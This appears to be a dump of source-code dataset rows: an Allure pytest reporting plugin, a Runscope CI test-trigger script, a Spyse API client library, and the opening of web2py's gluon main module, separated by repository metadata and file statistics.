self._fill_case(report, call, status, Status.FAILED) # FIXME: this is here only to work around xdist's stupid -x thing when in exits BEFORE THE TEARDOWN test log. 
Meh, i should file an issue to xdist if self._magicaldoublereport: # to minimize ze impact self.report_case(item, report) elif report.skipped: if hasattr(report, 'wasxfail'): self._fill_case(report, call, status, Status.PENDING) else: self._fill_case(report, call, status, Status.CANCELED) elif report.when == 'setup': # setup / teardown if report.failed: self._fill_case(report, call, status, Status.BROKEN) elif report.skipped: if hasattr(report, 'wasxfail'): self._fill_case(report, call, status, Status.PENDING) else: self._fill_case(report, call, status, Status.CANCELED) elif report.when == 'teardown': # as teardown is always called for testitem -- report our status here if not report.passed: if self.test.status not in FAILED_STATUSES: # if test was OK but failed at teardown => broken self._fill_case(report, call, status, Status.BROKEN) else: # mark it broken so, well, someone has idea of teardown failure # still, that's no big deal -- test has already failed # TODO: think about that once again self.test.status = Status.BROKEN # if a test isn't marked as "unreported" or it has failed, add it to the report. if not item.get_marker("unreported") or self.test.status in FAILED_STATUSES: self.report_case(item, report) def pytest_runtest_setup(item): item_labels = set((l.name, l.value) for l in labels_of(item)) # see label_type arg_labels = set().union(item.config.option.allurefeatures, item.config.option.allurestories, item.config.option.allureseverities) if arg_labels and not item_labels & arg_labels: pytest.skip('Not suitable with selected labels: %s.' % ', '.join(text_type(l) for l in sorted(arg_labels))) class LazyInitStepContext(StepContext): """ This is a step context used for decorated steps. It provides a possibility to create step decorators, being initiated before pytest_configure, when no AllureListener initiated yet. 
""" def __init__(self, allure_helper, title): self.allure_helper = allure_helper self.title = title self.step = None @property def allure(self): listener = self.allure_helper.get_listener() # if listener has `stack` we are inside a test # record steps only when that # FIXME: this breaks encapsulation a lot if hasattr(listener, 'stack'): return listener class AllureHelper(object): """ This object holds various utility methods used from ``pytest.allure`` namespace, like ``pytest.allure.attach`` """ def __init__(self): self._allurelistener = None # FIXME: this gets injected elsewhere, like in the pytest_configure def get_listener(self): return self._allurelistener def attach(self, name, contents, type=AttachmentType.TEXT): # @ReservedAssignment """ Attaches ``contents`` to a current context with given ``name`` and ``type``. """ if self._allurelistener: self._allurelistener.attach(name, contents, type) def label(self, name, *value): """ A decorator factory that returns ``pytest.mark`` for a given label. """ allure_label = getattr(pytest.mark, '%s.%s' % (Label.DEFAULT, name)) return allure_label(*value) def severity(self, severity): """ A decorator factory that returns ``pytest.mark`` for a given allure ``level``. """ return self.label(Label.SEVERITY, severity) def feature(self, *features): """ A decorator factory that returns ``pytest.mark`` for a given features. """ return self.label(Label.FEATURE, *features) def story(self, *stories): """ A decorator factory that returns ``pytest.mark`` for a given stories. """ return self.label(Label.STORY, *stories) def issue(self, *issues): """ A decorator factory that returns ``pytest.mark`` for a given issues. """ return self.label(Label.ISSUE, *issues) def dynamic_issue(self, *issues): """ Mark test ``issues`` from inside. 
""" if self._allurelistener: self._allurelistener.dynamic_issue(*issues) def description(self, description): """ Sets description for the test """ if self._allurelistener: self._allurelistener.description(description) def testcase(self, *testcases): """ A decorator factory that returns ``pytest.mark`` for a given testcases. """ return self.label(Label.TESTCASE, *testcases) def step(self, title): """ A contextmanager/decorator for steps. TODO: when moving to python 3, rework this with ``contextlib.ContextDecorator``. Usage examples:: import pytest def test_foo(): with pytest.allure.step('mystep'): assert False @pytest.allure.step('make test data') def make_test_data_bar(): raise ValueError('No data today') def test_bar(): assert make_test_data_bar() @pytest.allure.step def make_test_data_baz(): raise ValueError('No data today') def test_baz(): assert make_test_data_baz() @pytest.fixture() @pytest.allure.step('test fixture') def steppy_fixture(): return 1 def test_baz(steppy_fixture): assert steppy_fixture """ if callable(title): return LazyInitStepContext(self, title.__name__)(title) else: return LazyInitStepContext(self, title) def single_step(self, text): """ Writes single line to report. """ if self._allurelistener: with self.step(text): pass def environment(self, **env_dict): if self._allurelistener: self._allurelistener.environment.update(env_dict) @property def attach_type(self): return AttachmentType @property def severity_level(self): return Severity def __getattr__(self, attr): """ Provides fancy shortcuts for severity:: # these are the same pytest.allure.CRITICAL pytest.allure.severity(pytest.allure.severity_level.CRITICAL) """ if attr in dir(Severity) and not attr.startswith('_'): return self.severity(getattr(Severity, attr)) else: raise AttributeError MASTER_HELPER = AllureHelper() def pytest_namespace(): return {'allure': MASTER_HELPER} class AllureAgregatingListener(object): """ Listens to pytest hooks to generate reports for common tests. 
""" def __init__(self, impl, config): self.impl = impl # module's nodeid => TestSuite object self.suites = {} def pytest_sessionfinish(self): """ We are done and have all the results in `self.suites` Lets write em down. But first we kinda-unify the test cases. We expect cases to come from AllureTestListener -- and the have ._id field to manifest their identity. Of all the test cases in suite.testcases we leave LAST with the same ID -- becase logreport can be sent MORE THAN ONE TIME (namely, if the test fails and then gets broken -- to cope with the xdist's -x behavior we have to have tests even at CALL failures) TODO: do it in a better, more efficient way """ for s in self.suites.values(): if s.tests: # nobody likes empty suites s.stop = max(case.stop for case in s.tests) known_ids = set() refined_tests = [] for t in s.tests[::-1]: if t.id not in known_ids: known_ids.add(t.id) refined_tests.append(t) s.tests = refined_tests[::-1] with self.impl._reportfile('%s-testsuite.xml' % uuid.uuid4()) as f: self.impl._write_xml(f, s) self.impl.store_environment() def write_attach(self, attachment): """ Writes attachment object from the `AllureTestListener` to the FS, fixing it fields :param attachment: a :py:class:`allure.structure.Attach` object """ # OMG, that is bad attachment.source = self.impl._save_attach(attachment.source, attachment.type) attachment.type = attachment.type.mime_type def pytest_runtest_logreport(self, report): if hasattr(report, '_allure_result'): module_id, module_name, module_doc, environment, testcase = pickle.loads(report._allure_result) report._allure_result = None # so actual pickled data is garbage-collected, see https://github.com/allure-framework/allure-python/issues/98 self.impl.environment.update(environment) for a in testcase.iter_attachments(): self.write_attach(a) self.suites.setdefault(module_id, TestSuite(name=module_name, description=module_doc, tests=[], labels=[], start=testcase.start, # first case starts the suite! 
stop=None)).tests.append(testcase) CollectFail = namedtuple('CollectFail', 'name status message trace') class AllureCollectionListener(object): """ Listens to pytest collection-related hooks to generate reports for modules that failed to collect. """ def __init__(self, impl): self.impl = impl self.fails = [] def pytest_collectreport(self, report): if not report.passed: if report.failed: status = Status.BROKEN else: status = Status.CANCELED self.fails.append(CollectFail(name=mangle_testnames(report.nodeid.split("::"))[-1], status=status, message=get_exception_message(None, None, report), trace=report.longrepr)) def pytest_sessionfinish(self): """ Creates a testsuite with collection failures if there were any. """ if self.fails: self.impl.start_suite(name='test_collection_phase', title='Collection phase', description='This is the tests collection phase. Failures are modules that failed to collect.') for fail in self.fails: self.impl.start_case(name=fail.name.split(".")[-1]) self.impl.stop_case(status=fail.status, message=fail.message, trace=fail.trace) self.impl.stop_suite()
39.168675
183
0.572483
2,450
22,757
5.208163
0.215102
0.011285
0.007524
0.011285
0.151567
0.093574
0.087774
0.072414
0.068809
0.061599
0
0.001198
0.339939
22,757
580
184
39.236207
0.848279
0.282287
0
0.189655
0
0
0.074281
0.001379
0
0
0
0.012069
0
1
0.144828
false
0.017241
0.034483
0.013793
0.255172
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
5d8cdce66649554dda1ee6deb1afd812b2f3ebbf
2,146
py
Python
app.py
duckm8795/runscope-circleci
2fd42e64bddb4b8f34c437c2d834b92369c9a2bf
[ "Apache-2.0" ]
null
null
null
app.py
duckm8795/runscope-circleci
2fd42e64bddb4b8f34c437c2d834b92369c9a2bf
[ "Apache-2.0" ]
null
null
null
app.py
duckm8795/runscope-circleci
2fd42e64bddb4b8f34c437c2d834b92369c9a2bf
[ "Apache-2.0" ]
null
null
null
import requests import sys import time import os def main(): trigger_url = sys.argv[1] trigger_resp = requests.get(trigger_url) if trigger_resp.ok: trigger_json = trigger_resp.json().get("data", {}) test_runs = trigger_json.get("runs", []) print ("Started {} test runs.".format(len(test_runs))) results = {} while len(results.keys()) < len(test_runs): time.sleep(1) for run in test_runs: test_run_id = run.get("test_run_id") if not test_run_id in results: result = _get_result(run) if result.get("result") in ["pass", "fail"]: results[test_run_id] = result pass_count = sum([r.get("result") == "pass" for r in results.values()]) fail_count = sum([r.get("result") == "fail" for r in results.values()]) if fail_count > 0: print ("{} test runs passed. {} test runs failed.".format(pass_count, fail_count)) exit(1) print ("All test runs passed.") def _get_result(test_run): # generate Personal Access Token at https://www.runscope.com/applications if not "RUNSCOPE_ACCESS_TOKEN" in os.environ: print ("Please set the environment variable RUNSCOPE_ACCESS_TOKEN. You can get an access token by going to https://www.runscope.com/applications") exit(1) API_TOKEN = os.environ["RUNSCOPE_ACCESS_TOKEN"] opts = { "base_url": "https://api.runscope.com", "bucket_key": test_run.get("bucket_key"), "test_id": test_run.get("test_id"), "test_run_id": test_run.get("test_run_id") } result_url = "{base_url}/buckets/{bucket_key}/tests/{test_id}/results/{test_run_id}".format(**opts) print ("Getting result: {}".format(result_url)) headers = { "Authorization": "Bearer {}".format(API_TOKEN), "User-Agent": "python-trigger-sample" } result_resp = requests.get(result_url, headers=headers) if result_resp.ok: return result_resp.json().get("data") return None if __name__ == '__main__': main()
31.101449
154
0.605312
282
2,146
4.365248
0.297872
0.062551
0.051178
0.02437
0.152721
0
0
0
0
0
0
0.003137
0.257223
2,146
69
155
31.101449
0.769134
0.033085
0
0.040816
0
0.020408
0.267117
0.074253
0
0
0
0
0
1
0.040816
false
0.081633
0.081633
0
0.163265
0.102041
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5d8dbbff6df38e6773044260538db7a759525964
16,585
py
Python
spyse/client.py
fabaff/spyse-python
f286514ac052ebe6fa98f877d251d8f3cd4db1c4
[ "MIT" ]
9
2021-07-28T11:59:07.000Z
2022-02-17T02:25:06.000Z
spyse/client.py
fabaff/spyse-python
f286514ac052ebe6fa98f877d251d8f3cd4db1c4
[ "MIT" ]
2
2021-11-27T02:03:03.000Z
2022-02-02T11:33:34.000Z
spyse/client.py
fabaff/spyse-python
f286514ac052ebe6fa98f877d251d8f3cd4db1c4
[ "MIT" ]
7
2021-08-05T04:02:09.000Z
2022-03-04T14:11:04.000Z
import requests from typing import List, Optional from .models import AS, Domain, IP, CVE, Account, Certificate, Email, DNSHistoricalRecord, WHOISHistoricalRecord from .response import Response from .search_query import SearchQuery from limiter import get_limiter, limit class DomainsSearchResults: def __init__(self, results: List[Domain], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[Domain] = results class AutonomousSystemsSearchResults: def __init__(self, results: List[AS], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[AS] = results class IPSearchResults: def __init__(self, results: List[IP], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[IP] = results class CertificatesSearchResults: def __init__(self, results: List[Certificate], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[Certificate] = results class CVESearchResults: def __init__(self, results: List[CVE], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[CVE] = results class EmailsSearchResults: def __init__(self, results: List[Email], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[Email] = results class HistoricalDNSSearchResults: def __init__(self, results: List[DNSHistoricalRecord], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[DNSHistoricalRecord] = 
results class HistoricalWHOISSearchResults: def __init__(self, results: List[WHOISHistoricalRecord], total_items: int = None, search_id: str = None): self.total_items: Optional[int] = total_items self.search_id: Optional[str] = search_id self.results: List[WHOISHistoricalRecord] = results class Client: DEFAULT_BASE_URL = 'https://api.spyse.com/v4/data' MAX_LIMIT = 100 SEARCH_RESULTS_LIMIT = 10000 RATE_LIMIT_FRAME_IN_SECONDS = 1 def __init__(self, api_token, base_url=DEFAULT_BASE_URL): self.session = requests.Session() self.session.headers.update({'Authorization': 'Bearer ' + api_token}) self.session.headers.update({'User-Agent': 'spyse-python'}) self.base_url = base_url self.limiter = get_limiter(rate=self.RATE_LIMIT_FRAME_IN_SECONDS, capacity=1) self.account = self.get_quotas() self.limiter._capacity = self.account.requests_rate_limit def __get(self, endpoint: str) -> Response: with limit(self.limiter, consume=1): return Response.from_dict(self.session.get(endpoint).json()) def __search(self, endpoint, query: SearchQuery, lim: int = MAX_LIMIT, offset: int = 0) -> Response: with limit(self.limiter, consume=1): return Response.from_dict(self.session.post(endpoint, json={"search_params": query.get(), "limit": lim, "offset": offset}).json()) def __scroll(self, endpoint, query: SearchQuery, search_id: Optional[str] = None) -> Response: with limit(self.limiter, consume=1): if search_id: body = {"search_params": query.get(), "search_id": search_id} else: body = {"search_params": query.get()} return Response.from_dict(self.session.post(endpoint, json=body).json()) def set_user_agent(self, s: str): self.session.headers.update({'User-Agent': s}) def get_quotas(self) -> Optional[Account]: """Returns details about your account quotas.""" response = self.__get('{}/account/quota'.format(self.base_url)) response.check_errors() return Account.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def get_autonomous_system_details(self, asn: int) -> 
Optional[AS]: """Returns details about an autonomous system by AS number.""" response = self.__get('{}/as/{}'.format(self.base_url, asn)) response.check_errors() return AS.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def count_autonomous_systems(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/as/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def search_autonomous_systems(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> AutonomousSystemsSearchResults: """ Returns a list of autonomous systems that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/as/search'.format(self.base_url), query, limit, offset) response.check_errors() as_list = list() for r in response.data.items: as_list.append(AS.from_dict(r)) return AutonomousSystemsSearchResults(as_list, response.data.total_items) def scroll_autonomous_systems(self, query: SearchQuery, scroll_id: str = None) -> AutonomousSystemsSearchResults: """ Returns a list of autonomous systems that matched the search query. 
Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/as/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() as_list = list() for r in response.data.items: as_list.append(AS.from_dict(r)) return AutonomousSystemsSearchResults(as_list, search_id=response.data.search_id) def get_domain_details(self, domain_name: str) -> Optional[Domain]: """Returns details about domain""" response = self.__get('{}/domain/{}'.format(self.base_url, domain_name)) response.check_errors() return Domain.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_domains(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> DomainsSearchResults: """ Returns a list of domains that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/domain/search'.format(self.base_url), query, limit, offset) response.check_errors() domains = list() for r in response.data.items: domains.append(Domain.from_dict(r)) return DomainsSearchResults(domains, response.data.total_items) def count_domains(self, query: SearchQuery): """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/domain/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_domains(self, query: SearchQuery, scroll_id: str = None) -> DomainsSearchResults: """ Returns a list of domains that matched the search query. 
Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/domain/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() domains = list() for r in response.data.items: domains.append(Domain.from_dict(r)) return DomainsSearchResults(domains, search_id=response.data.search_id) def get_ip_details(self, ip: str) -> Optional[IP]: """Returns details about IP""" response = self.__get('{}/ip/{}'.format(self.base_url, ip)) response.check_errors() return IP.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_ip(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> IPSearchResults: """ Returns a list of IPv4 hosts that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/ip/search'.format(self.base_url), query, limit, offset) response.check_errors() ips = list() for r in response.data.items: ips.append(IP.from_dict(r)) return IPSearchResults(ips, response.data.total_items) def count_ip(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/ip/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_ip(self, query: SearchQuery, scroll_id: str = None) -> IPSearchResults: """ Returns a list of IPv4 hosts that matched the search query. 
Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/ip/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() ips = list() for r in response.data.items: ips.append(IP.from_dict(r)) return IPSearchResults(ips, search_id=response.data.search_id) def get_certificate_details(self, fingerprint_sha256: str) -> Optional[Certificate]: """Returns details about SSL/TLS certificate""" response = self.__get('{}/certificate/{}'.format(self.base_url, fingerprint_sha256)) response.check_errors() return Certificate.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_certificate(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> CertificatesSearchResults: """ Returns a list of SSL/TLS certificate hosts that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/certificate/search'.format(self.base_url), query, limit, offset) response.check_errors() certs = list() for r in response.data.items: certs.append(Certificate.from_dict(r)) return CertificatesSearchResults(certs, response.data.total_items) def count_certificate(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/certificate/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_certificate(self, query: SearchQuery, scroll_id: str = None) -> CertificatesSearchResults: """ Returns a list of SSL/TLS certificates that matched the search query. 
Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/certificate/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() certs = list() for r in response.data.items: certs.append(Certificate.from_dict(r)) return CertificatesSearchResults(certs, search_id=response.data.search_id) def get_cve_details(self, cve_id: str) -> Optional[CVE]: """Returns details about CVE""" response = self.__get('{}/cve/{}'.format(self.base_url, cve_id)) response.check_errors() return CVE.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_cve(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> CVESearchResults: """ Returns a list of CVE that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/cve/search'.format(self.base_url), query, limit, offset) response.check_errors() cve_list = list() for r in response.data.items: cve_list.append(CVE.from_dict(r)) return CVESearchResults(cve_list, response.data.total_items) def count_cve(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/cve/search/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_cve(self, query: SearchQuery, scroll_id: str = None) -> CVESearchResults: """ Returns a list of CVEs that matched the search query. 
Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/cve/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() cve_list = list() for r in response.data.items: cve_list.append(CVE.from_dict(r)) return CVESearchResults(cve_list, search_id=response.data.search_id) def get_email_details(self, email: str) -> Optional[Email]: """Returns details about email""" response = self.__get('{}/email/{}'.format(self.base_url, email)) response.check_errors() return Email.from_dict(response.data.items[0]) if len(response.data.items) > 0 else None def search_emails(self, query: SearchQuery, limit: int = MAX_LIMIT, offset: int = 0) -> EmailsSearchResults: """ Returns a list of emails that matched the search query. Allows getting only the first 10,000 results. """ response = self.__search('{}/email/search'.format(self.base_url), query, limit, offset) response.check_errors() emails = list() for r in response.data.items: emails.append(Email.from_dict(r)) return EmailsSearchResults(emails, response.data.total_items) def count_emails(self, query: SearchQuery) -> int: """Returns the precise number of search results that matched the search query.""" response = self.__search('{}/cve/email/count'.format(self.base_url), query) response.check_errors() return response.data.total_items def scroll_emails(self, query: SearchQuery, scroll_id: str = None) -> EmailsSearchResults: """ Returns a list of emails that matched the search query. 
Allows getting all the results but requires a Spyse Pro subscription """ response = self.__scroll('{}/email/scroll/search'.format(self.base_url), query, scroll_id) response.check_errors() emails = list() for r in response.data.items: emails.append(Email.from_dict(r)) return EmailsSearchResults(emails, search_id=response.data.search_id) def search_historical_dns(self, dns_type, domain_name: str, limit: int = MAX_LIMIT, offset: int = 0) \ -> HistoricalDNSSearchResults: """ Returns the historical DNS records about the given domain name. """ response = self.__get(f'{self.base_url}/history/dns/{dns_type}/{domain_name}?limit={limit}&offset={offset}') response.check_errors() records = list() for r in response.data.items: records.append(DNSHistoricalRecord.from_dict(r)) return HistoricalDNSSearchResults(records, response.data.total_items) def search_historical_whois(self, domain_name: str, limit: int = MAX_LIMIT, offset: int = 0) \ -> HistoricalWHOISSearchResults: """ Returns the historical WHOIS records for the given domain name. """ response = self.__get(f'{self.base_url}/history/domain-whois/{domain_name}?limit={limit}&offset={offset}') response.check_errors() records = list() for r in response.data.items: records.append(WHOISHistoricalRecord.from_dict(r)) return HistoricalWHOISSearchResults(records, response.data.total_items)
42.308673
117
0.662466
2,039
16,585
5.207945
0.071604
0.054242
0.029005
0.040023
0.743479
0.699972
0.67125
0.636689
0.627084
0.614559
0
0.00586
0.228339
16,585
391
118
42.41688
0.823879
0.136087
0
0.4
0
0.008696
0.052369
0.022031
0
0
0
0
0
1
0.173913
false
0
0.026087
0
0.386957
0.008696
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5d8fd5fa2bcd3f5669762aabbd18717b761f3d16
30,184
py
Python
gluon/main.py
scudette/rekall-agent-server
e553f1ae5279f75a8f5b0c0c4847766b60ed86eb
[ "BSD-3-Clause" ]
21
2018-02-16T17:43:59.000Z
2021-12-29T12:08:28.000Z
gluon/main.py
scudette/rekall-agent-server
e553f1ae5279f75a8f5b0c0c4847766b60ed86eb
[ "BSD-3-Clause" ]
12
2017-11-01T14:54:29.000Z
2018-02-01T22:02:12.000Z
gluon/main.py
scudette/rekall-agent-server
e553f1ae5279f75a8f5b0c0c4847766b60ed86eb
[ "BSD-3-Clause" ]
8
2018-10-08T03:48:00.000Z
2022-03-31T12:13:01.000Z
#!/bin/env python # -*- coding: utf-8 -*- """ | This file is part of the web2py Web Framework | Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu> | License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) The gluon wsgi application --------------------------- """ from __future__ import print_function if False: import import_all # DO NOT REMOVE PART OF FREEZE PROCESS import gc import os import re import copy import sys import time import datetime import signal import socket import random import string from gluon._compat import Cookie, urllib2 #from thread import allocate_lock from gluon.fileutils import abspath, write_file from gluon.settings import global_settings from gluon.utils import web2py_uuid from gluon.admin import add_path_first, create_missing_folders, create_missing_app_folders from gluon.globals import current # Remarks: # calling script has inserted path to script directory into sys.path # applications_parent (path to applications/, site-packages/ etc) # defaults to that directory set sys.path to # ("", gluon_parent/site-packages, gluon_parent, ...) # # this is wrong: # web2py_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # because we do not want the path to this file which may be Library.zip # gluon_parent is the directory containing gluon, web2py.py, logging.conf # and the handlers. # applications_parent (web2py_path) is the directory containing applications/ # and routes.py # The two are identical unless web2py_path is changed via the web2py.py -f folder option # main.web2py_path is the same as applications_parent (for backward compatibility) web2py_path = global_settings.applications_parent # backward compatibility create_missing_folders() # set up logging for subsequent imports import logging import logging.config # This needed to prevent exception on Python 2.5: # NameError: name 'gluon' is not defined # See http://bugs.python.org/issue1436 # attention!, the import Tkinter in messageboxhandler, changes locale ... 
import gluon.messageboxhandler logging.gluon = gluon # so we must restore it! Thanks ozancag import locale locale.setlocale(locale.LC_CTYPE, "C") # IMPORTANT, web2py requires locale "C" exists = os.path.exists pjoin = os.path.join try: logging.config.fileConfig(abspath("logging.conf")) except: # fails on GAE or when logfile is missing logging.basicConfig() logger = logging.getLogger("web2py") from gluon.restricted import RestrictedError from gluon.http import HTTP, redirect from gluon.globals import Request, Response, Session from gluon.compileapp import build_environment, run_models_in, \ run_controller_in, run_view_in from gluon.contenttype import contenttype from pydal.base import BaseAdapter from gluon.validators import CRYPT from gluon.html import URL, xmlescape from gluon.utils import is_valid_ip_address, getipaddrinfo from gluon.rewrite import load as load_routes, url_in, THREAD_LOCAL as rwthread, \ try_rewrite_on_error, fixup_missing_path_info from gluon import newcron __all__ = ['wsgibase', 'save_password', 'appfactory', 'HttpServer'] requests = 0 # gc timer # Security Checks: validate URL and session_id here, # accept_language is validated in languages # pattern used to validate client address regex_client = re.compile('[\w\-:]+(\.[\w\-]+)*\.?') # ## to account for IPV6 try: version_info = open(pjoin(global_settings.gluon_parent, 'VERSION'), 'r') raw_version_string = version_info.read().split()[-1].strip() version_info.close() global_settings.web2py_version = raw_version_string web2py_version = global_settings.web2py_version except: raise RuntimeError("Cannot determine web2py version") try: from gluon import rocket except: if not global_settings.web2py_runtime_gae: logger.warn('unable to import Rocket') load_routes() HTTPS_SCHEMES = set(('https', 'HTTPS')) def get_client(env): """ Guesses the client address from the environment variables First tries 'http_x_forwarded_for', secondly 'remote_addr' if all fails, assume '127.0.0.1' or '::1' (running locally) 
""" eget = env.get g = regex_client.search(eget('http_x_forwarded_for', '')) client = (g.group() or '').split(',')[0] if g else None if client in (None, '', 'unknown'): g = regex_client.search(eget('remote_addr', '')) if g: client = g.group() elif env.http_host.startswith('['): # IPv6 client = '::1' else: client = '127.0.0.1' # IPv4 if not is_valid_ip_address(client): raise HTTP(400, "Bad Request (request.client=%s)" % client) return client def serve_controller(request, response, session): """ This function is used to generate a dynamic page. It first runs all models, then runs the function in the controller, and then tries to render the output using a view/template. this function must run from the [application] folder. A typical example would be the call to the url /[application]/[controller]/[function] that would result in a call to [function]() in applications/[application]/[controller].py rendered by applications/[application]/views/[controller]/[function].html """ # ################################################## # build environment for controller and view # ################################################## environment = build_environment(request, response, session) # set default view, controller can override it response.view = '%s/%s.%s' % (request.controller, request.function, request.extension) # also, make sure the flash is passed through # ################################################## # process models, controller and view (if required) # ################################################## run_models_in(environment) response._view_environment = copy.copy(environment) page = run_controller_in(request.controller, request.function, environment) if isinstance(page, dict): response._vars = page response._view_environment.update(page) page = run_view_in(response._view_environment) # logic to garbage collect after exec, not always, once every 100 requests global requests requests = ('requests' in globals()) and (requests + 1) % 100 or 0 if not requests: 
gc.collect() # end garbage collection logic # ################################################## # set default headers it not set # ################################################## default_headers = [ ('Content-Type', contenttype('.' + request.extension)), ('Cache-Control', 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0'), ('Expires', time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())), ('Pragma', 'no-cache')] for key, value in default_headers: response.headers.setdefault(key, value) raise HTTP(response.status, page, **response.headers) class LazyWSGI(object): def __init__(self, environ, request, response): self.wsgi_environ = environ self.request = request self.response = response @property def environ(self): if not hasattr(self, '_environ'): new_environ = self.wsgi_environ new_environ['wsgi.input'] = self.request.body new_environ['wsgi.version'] = 1 self._environ = new_environ return self._environ def start_response(self, status='200', headers=[], exec_info=None): """ in controller you can use: - request.wsgi.environ - request.wsgi.start_response to call third party WSGI applications """ self.response.status = str(status).split(' ', 1)[0] self.response.headers = dict(headers) return lambda *args, **kargs: \ self.response.write(escape=False, *args, **kargs) def middleware(self, *middleware_apps): """ In you controller use:: @request.wsgi.middleware(middleware1, middleware2, ...) to decorate actions with WSGI middleware. actions must return strings. 
uses a simulated environment so it may have weird behavior in some cases """ def middleware(f): def app(environ, start_response): data = f() start_response(self.response.status, self.response.headers.items()) if isinstance(data, list): return data return [data] for item in middleware_apps: app = item(app) def caller(app): return app(self.environ, self.start_response) return lambda caller=caller, app=app: caller(app) return middleware def wsgibase(environ, responder): """ The gluon wsgi application. The first function called when a page is requested (static or dynamic). It can be called by paste.httpserver or by apache mod_wsgi (or any WSGI-compatible server). - fills request with info - the environment variables, replacing '.' with '_' - adds web2py path and version info - compensates for fcgi missing path_info and query_string - validates the path in url The url path must be either: 1. for static pages: - /<application>/static/<file> 2. for dynamic pages: - /<application>[/<controller>[/<function>[/<sub>]]][.<extension>] The naming conventions are: - application, controller, function and extension may only contain `[a-zA-Z0-9_]` - file and sub may also contain '-', '=', '.' 
and '/' """ eget = environ.get current.__dict__.clear() request = Request(environ) response = Response() session = Session() env = request.env #env.web2py_path = global_settings.applications_parent env.web2py_version = web2py_version #env.update(global_settings) static_file = False http_response = None try: try: try: # ################################################## # handle fcgi missing path_info and query_string # select rewrite parameters # rewrite incoming URL # parse rewritten header variables # parse rewritten URL # serve file if static # ################################################## fixup_missing_path_info(environ) (static_file, version, environ) = url_in(request, environ) response.status = env.web2py_status_code or response.status if static_file: if eget('QUERY_STRING', '').startswith('attachment'): response.headers['Content-Disposition'] \ = 'attachment' if version: response.headers['Cache-Control'] = 'max-age=315360000' response.headers[ 'Expires'] = 'Thu, 31 Dec 2037 23:59:59 GMT' response.stream(static_file, request=request) # ################################################## # fill in request items # ################################################## app = request.application # must go after url_in! 
